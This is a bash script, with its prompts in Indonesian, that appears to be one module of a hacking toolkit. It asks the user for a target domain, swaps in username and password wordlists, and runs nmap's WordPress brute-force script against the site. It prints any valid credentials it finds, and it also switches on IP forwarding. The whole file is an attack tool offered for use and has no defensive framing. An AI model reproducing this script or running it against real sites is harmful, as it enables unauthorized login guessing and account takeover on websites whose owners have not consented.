#!/bin/bash

clear
echo "1" > /proc/sys/net/ipv4/ip_forward
echo "   
          \033[32;1m..::|[ WordPress BruteForce ]|::.. \033[0m
"
echo -n "\033[33m[#]\033[0m Masukan Domain Target : "
read domen
echo "\n==> Target: \033[1;33m$domen\033[0m"
echo "[?] Tekan \033[36;1mL\033[0m Untuk Lanjut"
echo "[?] Tekan \033[36;1mM\033[0m Untuk Masukan Ulang Target"
echo -n "[?] Pilihan : "
read kentot
echo "\n[!] Dipilih : $kentot"
if [ $kentot = m ] || [ $kentot = M ]
then
clear
sh wp-brute
fi

if [ $kentot = l ] || [ $kentot = L ]
then
echo "[~] Mempersiapkan Wordlist.."
cd ../wodlis
mv passwords.lst passwords.lst.bak
mv usernames.lst usernames.lst.bak

cp -r * ../
echo "\033[0m[~]\033[0m Proses Bruteforce.."
nmap -sV --script http-wordpress-brute $domen | awk '/Nmap scan report for/{print "\n\033[1;34m[+]\033[37m Target: \033[1;33m" $5 "\033[0m" ;} /Valid credentials/{print " \033[1;32m [-] \033[1;37mAkun ditemukan : \033[1;32m" $2 "\033[0m" ;} /No valid accounts found/{print " \033[1;33m [-] \033[33mTidak ditemukan akun valid!\033\[0m" ;}'
rm -rf passwords.lst
rm -rf usernames.lst
mv passwords.lst.bak passwords.lst
mv usernames.lst.bak usernames.lst
fi

echo "\n\033[0m[~]\033[0m BruteForce Selesai...
"
echo "
=> Tekan \033[33mB\033[0m untuk kembali
=> Tekan \033[31mK\033[0m untuk keluar"
echo -n "=> Pilihan: "
read peler
if [ $peler = b ] || [ $peler = B ]
then
clear
cd ../tools
sh start
fi

if [ $peler = k ] || [ $peler = K ]
then
clear
cd ../tools
sh exit
fi


